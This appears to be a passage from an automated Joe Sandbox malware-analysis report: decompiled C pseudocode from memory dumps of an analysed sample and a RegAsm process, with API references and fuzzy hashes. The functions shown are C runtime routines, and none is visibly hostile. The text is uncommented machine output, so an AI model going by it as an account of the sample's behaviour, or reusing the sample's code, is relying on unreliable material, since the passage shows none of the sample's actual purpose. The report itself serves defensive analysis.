        								_t73 = _t59;
        								goto L24;
        							}
        						} else {
        							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
        							_t54 = _t90 + 0x20; // 0x20
        							_t73 = _t54;
        							L24:
        							 *_t97 = _t73;
        						}
        						_t68 = _v1828;
        						_t61 = _t101 + 0x119; // 0xab5d70
        						_t96 = _t61;
        						_t90 = _t90 + 1;
        						__eflags = _t90 - 0x100;
        					} while (_t90 < 0x100);
        				} else {
        					_t74 = 0;
        					do {
        						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
        						_t74 = _t74 + 1;
        					} while (_t74 < 0x100);
        					_t75 = _v1814;
        					_t93 =  &_v1814;
        					_v264 = 0x20;
        					while(1) {
        						_t108 = _t75;
        						if(_t75 == 0) {
        							break;
        						}
        						_t95 =  *(_t93 + 1) & 0x000000ff;
        						_t76 = _t75 & 0x000000ff;
        						while(1) {
        							__eflags = _t76 - _t95;
        							if(_t76 > _t95) {
        								break;
        							}
        							__eflags = _t76 - 0x100;
        							if(_t76 < 0x100) {
        								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
        								_t76 = _t76 + 1;
        								__eflags = _t76;
        								continue;
        							}
        							break;
        						}
        						_t93 = _t93 + 2;
        						__eflags = _t93;
        						_t75 =  *_t93;
        					}
        					_t13 = _t101 + 4; // 0x5efc4d8b
        					E00AB6E4E(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
        					_t16 = _t101 + 4; // 0x5efc4d8b
        					_t19 = _t101 + 0x21c; // 0xc8358959
        					E00AB8A70(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0);
        					_t21 = _t101 + 4; // 0x5efc4d8b
        					_t23 = _t101 + 0x21c; // 0xc8358959
        					E00AB8A70(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
        					_t94 = 0;
        					do {
        						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
        						if((_t86 & 0x00000001) == 0) {
        							__eflags = _t86 & 0x00000002;
        							if((_t86 & 0x00000002) == 0) {
        								 *((char*)(_t101 + _t94 + 0x119)) = 0;
        							} else {
        								_t37 = _t101 + _t94 + 0x19;
        								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
        								__eflags =  *_t37;
        								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
        								goto L15;
        							}
        						} else {
        							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
        							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
        							L15:
        							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
        						}
        						_t94 = _t94 + 1;
        					} while (_t94 < 0x100);
        				}
        				return E00AB29BB(_v8 ^ _t102);
        			}

        APIs
        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00AB574A
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Info
        • String ID: ]iL$
        • API String ID: 1807457897-2741433938
        • Opcode ID: 6008e244ac3ab8894b28efba6d9eff838f5d1ef8f25661665fe2ce6324800a45
        • Instruction ID: db97b2880ecd199d012e5b12de3cd7ae48ac851ab3af6dda2caabd15d31279e0
        • Opcode Fuzzy Hash: 6008e244ac3ab8894b28efba6d9eff838f5d1ef8f25661665fe2ce6324800a45
        • Instruction Fuzzy Hash: 7641F9709046989FDF228B75CC84BFABBBDEB45308F1408EDE58A86143D2359A45DF60
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E00AB9A22(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
        				signed int _v8;
        				char _v10;
        				void _v5128;
        				intOrPtr _v5132;
        				long _v5136;
        				void* _v5140;
        				signed int _t29;
        				intOrPtr _t35;
        				long _t43;
        				signed int _t44;
        				signed short* _t47;
        				void* _t52;
        				signed int _t56;
        				signed int* _t58;
        				long _t60;
        				intOrPtr* _t63;
        				signed int _t65;
        
        				E00ABC1B0();
        				_t29 =  *0xac3018; // 0x4c695d09
        				_v8 = _t29 ^ _t65;
        				_t49 = _a8;
        				_t47 = _a12;
        				_t63 = _a4;
        				_t52 =  *( *((intOrPtr*)(0xac3f60 + (_a8 >> 6) * 4)) + 0x18 + (_t49 & 0x0000003f) * 0x30);
        				_t35 = _a16 + _t47;
        				_v5140 = _t52;
        				_v5132 = _t35;
        				 *_t63 = 0;
        				 *((intOrPtr*)(_t63 + 4)) = 0;
        				 *((intOrPtr*)(_t63 + 8)) = 0;
        				while(_t47 < _t35) {
        					_t58 =  &_v5128;
        					while(_t47 < _t35) {
        						_t44 =  *_t47 & 0x0000ffff;
        						_t47 =  &(_t47[1]);
        						if(_t44 == 0xa) {
        							 *((intOrPtr*)(_t63 + 8)) =  *((intOrPtr*)(_t63 + 8)) + 2;
        							_t56 = 0xd;
        							 *_t58 = _t56;
        							_t58 =  &(_t58[0]);
        						}
        						 *_t58 = _t44;
        						_t58 =  &(_t58[0]);
        						_t35 = _v5132;
        						if(_t58 <  &_v10) {
        							continue;
        						}
        						break;
        					}
        					_t60 = _t58 -  &_v5128 & 0xfffffffe;
        					if(WriteFile(_t52,  &_v5128, _t60,  &_v5136, 0) == 0) {
        						 *_t63 = GetLastError();
        					} else {
        						_t43 = _v5136;
        						 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + _t43;
        						if(_t43 >= _t60) {
        							_t35 = _v5132;
        							_t52 = _v5140;
        							continue;
        						}
        					}
        					L12:
        					return E00AB29BB(_v8 ^ _t65);
        				}
        				goto L12;
        			}

        APIs
        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00AB9E5F,?,00000000,?,00000000,00000000), ref: 00AB9ACC
        • GetLastError.KERNEL32(?,00AB9E5F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9AF5
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: ]iL
        • API String ID: 442123175-4085116960
        • Opcode ID: c2e3571628eb9a93032e64d0c4b7d6b40a1e2f54a29eba5c1faaf350467d06c0
        • Instruction ID: 88c4f1a824381f83444cb31ecfbb8dafd7a0dbef36c287799d225329e0d964d7
        • Opcode Fuzzy Hash: c2e3571628eb9a93032e64d0c4b7d6b40a1e2f54a29eba5c1faaf350467d06c0
        • Instruction Fuzzy Hash: 06318771A00215DBCB24CF5ACD80ADAB3F9FF48350F2085AEE50AD7251E730AD82CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E00AB9943(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
        				signed int _v8;
        				char _v9;
        				void _v5128;
        				intOrPtr _v5132;
        				long _v5136;
        				void* _v5140;
        				signed int _t31;
        				intOrPtr _t37;
        				long _t45;
        				char _t46;
        				intOrPtr* _t49;
        				void* _t54;
        				char* _t58;
        				long _t59;
        				signed int* _t62;
        				signed int _t64;
        
        				E00ABC1B0();
        				_t31 =  *0xac3018; // 0x4c695d09
        				_v8 = _t31 ^ _t64;
        				_t51 = _a8;
        				_t49 = _a12;
        				_t62 = _a4;
        				_t54 =  *( *((intOrPtr*)(0xac3f60 + (_a8 >> 6) * 4)) + 0x18 + (_t51 & 0x0000003f) * 0x30);
        				 *_t62 =  *_t62 & 0x00000000;
        				_t37 = _a16 + _t49;
        				_t62[1] = _t62[1] & 0x00000000;
        				_t62[2] = _t62[2] & 0x00000000;
        				_v5140 = _t54;
        				_v5132 = _t37;
        				while(_t49 < _t37) {
        					_t58 =  &_v5128;
        					while(_t49 < _t37) {
        						_t46 =  *_t49;
        						_t49 = _t49 + 1;
        						if(_t46 == 0xa) {
        							_t62[2] = _t62[2] + 1;
        							 *_t58 = 0xd;
        							_t58 = _t58 + 1;
        						}
        						 *_t58 = _t46;
        						_t58 = _t58 + 1;
        						_t37 = _v5132;
        						if(_t58 <  &_v9) {
        							continue;
        						}
        						break;
        					}
        					_t59 = _t58 -  &_v5128;
        					if(WriteFile(_t54,  &_v5128, _t59,  &_v5136, 0) == 0) {
        						 *_t62 = GetLastError();
        					} else {
        						_t45 = _v5136;
        						_t62[1] = _t62[1] + _t45;
        						if(_t45 >= _t59) {
        							_t37 = _v5132;
        							_t54 = _v5140;
        							continue;
        						}
        					}
        					L12:
        					return E00AB29BB(_v8 ^ _t64);
        				}
        				goto L12;
        			}

        APIs
        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00AB9E7F,?,00000000,?,00000000,00000000), ref: 00AB99DE
        • GetLastError.KERNEL32(?,00AB9E7F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9A07
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: ]iL
        • API String ID: 442123175-4085116960
        • Opcode ID: 28d8347c2fca788608365d7c8eb0588a85bed847a73390eadd24a731566eab42
        • Instruction ID: 1e6d7de4bc232ae4b90a0590ce9bfb4fd4dc0096d3a0cf55a6b3f9d2d4f78e6d
        • Opcode Fuzzy Hash: 28d8347c2fca788608365d7c8eb0588a85bed847a73390eadd24a731566eab42
        • Instruction Fuzzy Hash: E4219475A002199FCB15CF59DC80BEAB3F9FB48351F1044AEE64AD7252D730AE86CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 90%
        			E00AB621C(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
        				struct HINSTANCE__* _t13;
        				signed int* _t20;
        				signed int _t27;
        				signed int _t28;
        				signed int _t29;
        				signed int _t33;
        				intOrPtr* _t34;
        
        				_t20 = 0xac3ed8 + _a4 * 4;
        				_t27 =  *0xac3018; // 0x4c695d09
        				_t29 = _t28 | 0xffffffff;
        				_t33 = _t27 ^  *_t20;
        				asm("ror esi, cl");
        				if(_t33 == _t29) {
        					L14:
        					return 0;
        				}
        				if(_t33 == 0) {
        					_t34 = _a12;
        					if(_t34 == _a16) {
        						L7:
        						_t13 = 0;
        						L8:
        						if(_t13 == 0) {
        							L13:
        							_push(0x20);
        							asm("ror edi, cl");
        							 *_t20 = _t29 ^ _t27;
        							goto L14;
        						}
        						_t33 = GetProcAddress(_t13, _a8);
        						if(_t33 == 0) {
        							_t27 =  *0xac3018; // 0x4c695d09
        							goto L13;
        						}
        						 *_t20 = E00AB3074(_t33);
        						goto L2;
        					} else {
        						goto L4;
        					}
        					while(1) {
        						L4:
        						_t13 = E00AB62B8( *_t34);
        						if(_t13 != 0) {
        							break;
        						}
        						_t34 = _t34 + 4;
        						if(_t34 != _a16) {
        							continue;
        						}
        						_t27 =  *0xac3018; // 0x4c695d09
        						goto L7;
        					}
        					_t27 =  *0xac3018; // 0x4c695d09
        					goto L8;
        				}
        				L2:
        				return _t33;
        			}

        APIs
        • GetProcAddress.KERNEL32(00000000,?), ref: 00AB627C
        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AB6289
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AddressProc__crt_fast_encode_pointer
        • String ID: ]iL
        • API String ID: 2279764990-4085116960
        • Opcode ID: 03e30ba603b1a1f5449c1a468b5313ddfa93089470661de3dcab7d4add67a4da
        • Instruction ID: 10673eeaf327e87ffa1608a4c54df9824993c6115c582d630a00a9ccc19388cd
        • Opcode Fuzzy Hash: 03e30ba603b1a1f5449c1a468b5313ddfa93089470661de3dcab7d4add67a4da
        • Instruction Fuzzy Hash: 0211E937E005259BAF35DFA8DC409EA73ADABC43207164220FD19AB256DA35ED4297D0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E00AB29BB(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
        
        				asm("repne jnz 0x5");
        				asm("repne ret");
        				asm("repne jmp 0x2e");
        				SetUnhandledExceptionFilter(0);
        				UnhandledExceptionFilter(_a4);
        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
        			}

        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AB29FF
        • ___raise_securityfailure.LIBCMT ref: 00AB2AE6
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: FeaturePresentProcessor___raise_securityfailure
        • String ID: ]iL
        • API String ID: 3761405300-4085116960
        • Opcode ID: 8f3def2b4404eaf3c3714ab354f515e0a1c9f81bc51f6293855593f63384f99b
        • Instruction ID: 24dbc901ebb02f6703e61090915f37b98acaf3323e9628ec008a9a1c68832295
        • Opcode Fuzzy Hash: 8f3def2b4404eaf3c3714ab354f515e0a1c9f81bc51f6293855593f63384f99b
        • Instruction Fuzzy Hash: 2621E2FB500201AEDB14DF95F946E947BF8FB08314F12806AF9188B3A1E3B196828B44
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 28%
        			E00AB6564(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
        				signed int _v8;
        				signed int _t18;
        				intOrPtr* _t31;
        				signed int _t33;
        
        				_t26 = __ecx;
        				_push(__ecx);
        				_t18 =  *0xac3018; // 0x4c695d09
        				_v8 = _t18 ^ _t33;
        				_push(__esi);
        				_t31 = E00AB621C(0x16, "LCMapStringEx", 0xabe264, "LCMapStringEx");
        				if(_t31 == 0) {
        					LCMapStringW(E00AB65EC(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
        				} else {
        					 *0xabd1b8(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
        					 *_t31();
        				}
        				return E00AB29BB(_v8 ^ _t33);
        			}

        APIs
        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 00AB65D5
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: String
        • String ID: ]iL$LCMapStringEx
        • API String ID: 2568140703-2670345515
        • Opcode ID: 90296d6683e05fe2b22d7a3bf4785f120887dc6546665973259b54bfd5548b68
        • Instruction ID: 4d9a67a91ef78993ce33e6555794450622c1efdc2559e458c1b4775eb28124a1
        • Opcode Fuzzy Hash: 90296d6683e05fe2b22d7a3bf4785f120887dc6546665973259b54bfd5548b68
        • Instruction Fuzzy Hash: E401E932540109BBCF12AF90DD06DEE7F6AFF08750F054614FE1965162CA768A31EB90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 20%
        			E00AB6502(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
        				signed int _v8;
        				signed int _t8;
        				intOrPtr* _t20;
        				signed int _t22;
        
        				_push(__ecx);
        				_t8 =  *0xac3018; // 0x4c695d09
        				_v8 = _t8 ^ _t22;
        				_t20 = E00AB621C(0x14, "InitializeCriticalSectionEx", 0xabe25c, 0xabe264);
        				if(_t20 == 0) {
        					InitializeCriticalSectionAndSpinCount(_a4, _a8);
        				} else {
        					 *0xabd1b8(_a4, _a8, _a12);
        					 *_t20();
        				}
        				return E00AB29BB(_v8 ^ _t22);
        			}

        APIs
        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00AB654D
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: CountCriticalInitializeSectionSpin
        • String ID: ]iL$InitializeCriticalSectionEx
        • API String ID: 2593887523-1193642208
        • Opcode ID: 21d5792640d6ec951290b14261fb03e416517f2777addf90fde6514cf6893873
        • Instruction ID: 06945d7e5217d8f7a373162316a46f24338dfcbee2346023d2a94ecf87d7f668
        • Opcode Fuzzy Hash: 21d5792640d6ec951290b14261fb03e416517f2777addf90fde6514cf6893873
        • Instruction Fuzzy Hash: 06F0B435640208BBCF11AF95DD05DEE7F69EF04720F004255FD091A262DA764A21ABD1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 47%
        			E00AB3F2F(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
        				void* _v0;
        				signed int _v8;
        				void* __ebp;
        				signed int _t8;
        				int _t14;
        				intOrPtr* _t15;
        				intOrPtr _t17;
        				intOrPtr _t20;
        				void* _t22;
        				void* _t23;
        				void* _t27;
        				intOrPtr* _t30;
        				void* _t37;
        
        				_t28 = __edi;
        				_t27 = __edx;
        				_t21 = __ebx;
        				_t8 =  *0xac3018; // 0x4c695d09
        				_t22 = 0x20;
        				_t23 = _t22 - (_t8 & 0x0000001f);
        				asm("ror eax, cl");
        				_t37 =  *0xac3cdc - (0 ^  *0xac3018); // 0x4c695d09
        				if(_t37 != 0) {
        					_push(0xc);
        					_push(0xac1e70);
        					E00ABBF00(__edi, __esi);
        					_t30 =  *((intOrPtr*)(E00AB4C4A(__ebx, _t23, _t27) + 0xc));
        					if(_t30 != 0) {
        						_v8 = _v8 & 0x00000000;
        						 *0xabd1b8();
        						 *_t30();
        						_v8 = 0xfffffffe;
        					}
        					_t14 = E00AB4758(_t21, _t27, _t28, _t30);
        					asm("int3");
        					if(_v8 != 0) {
        						_t14 = HeapFree( *0xac4170, 0, _v0);
        						if(_t14 == 0) {
        							_push(_t30);
        							_t15 = E00AB501F();
        							_t17 = E00AB4FA6(GetLastError());
        							 *_t15 = _t17;
        							return _t17;
        						}
        					}
        					return _t14;
        				} else {
        					_t20 = E00AB3CF6(_a4);
        					 *0xac3cdc = _t20;
        					return _t20;
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: _abort
        • String ID: ]iL$]iL
        • API String ID: 1888311480-71639355
        • Opcode ID: cd6bc306de73f18178fa7cd9fcf2323c0bbd628986b4bcfb978ed77c102902ef
        • Instruction ID: e8ab7ea2e1f8dc8152d1b00e64c9a15628cbec33ec90cdca8c5faacff2fc9406
        • Opcode Fuzzy Hash: cd6bc306de73f18178fa7cd9fcf2323c0bbd628986b4bcfb978ed77c102902ef
        • Instruction Fuzzy Hash: 3FF0B433614204ABDF14FFB8ED15A9D37A5A705B20F12C115F5049F1A3CB308A459A80
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 15%
        			E00AB63A7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
        				signed int _v8;
        				signed int _t4;
        				intOrPtr* _t16;
        				signed int _t18;
        
        				_push(__ecx);
        				_t4 =  *0xac3018; // 0x4c695d09
        				_v8 = _t4 ^ _t18;
        				_t16 = E00AB621C(3, "FlsAlloc", 0xabe220, 0xabe228);
        				if(_t16 == 0) {
        					TlsAlloc();
        				} else {
        					 *0xabd1b8(_a4);
        					 *_t16();
        				}
        				return E00AB29BB(_v8 ^ _t18);
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Alloc
        • String ID: ]iL$FlsAlloc
        • API String ID: 2773662609-387274156
        • Opcode ID: 831ca6d907d715d1d688f4dcc29f79dbd7fb71765842c8fb5768df0238e23aa7
        • Instruction ID: c8c7dc84918bf4ebcd23f7788380fecaf951daf54610ea41480708e6435f8f9a
        • Opcode Fuzzy Hash: 831ca6d907d715d1d688f4dcc29f79dbd7fb71765842c8fb5768df0238e23aa7
        • Instruction Fuzzy Hash: 8DE02B31B40218B78714EF95ED06EED7BACEB08B20F040665FC0A57393DE769E0296E5
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Free
        • String ID: ]iL$FlsFree
        • API String ID: 3978063606-402225999
        • Opcode ID: 7a2a3aab9062fec5af04eb170229de71dd58d0af73ac5206a2320342d5d5e82e
        • Instruction ID: fff53efff5b0276efdda518bf8763fe0d9e66ef7edfde1d1ba3ea7003f17d839
        • Opcode Fuzzy Hash: 7a2a3aab9062fec5af04eb170229de71dd58d0af73ac5206a2320342d5d5e82e
        • Instruction Fuzzy Hash: 23E0E531B40218BB8A14EB959D06DEEBB6CEB04B10B410659FC0A57293DD325E1296D9
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000C.00000002.318290334.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_11ed000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9290293dd2cf6ba8c8f5330a0ff089a7f99f77baff58162fa38ff7670f55bc5e
        • Instruction ID: e28870d31fe47ceb856f1782e3f31bddf9a0c134124dbef686a825ae840901e0
        • Opcode Fuzzy Hash: 9290293dd2cf6ba8c8f5330a0ff089a7f99f77baff58162fa38ff7670f55bc5e
        • Instruction Fuzzy Hash: F421F4B1604640DFDF09CF94E9C8B26BBB1FB88318F24C569E9054A206C336D855CBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000C.00000002.318290334.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_11ed000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction ID: 7fc1b24ce9cd0b7409fc7061df4b6115d1f11581a6efbc97cdbe4e0f596496d1
        • Opcode Fuzzy Hash: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction Fuzzy Hash: E711AF76904680CFDF16CF94D9C4B16BFB1FB84324F24C6A9D9054B256C33AD456CBA2
        Uniqueness

        Uniqueness Score: -1.00%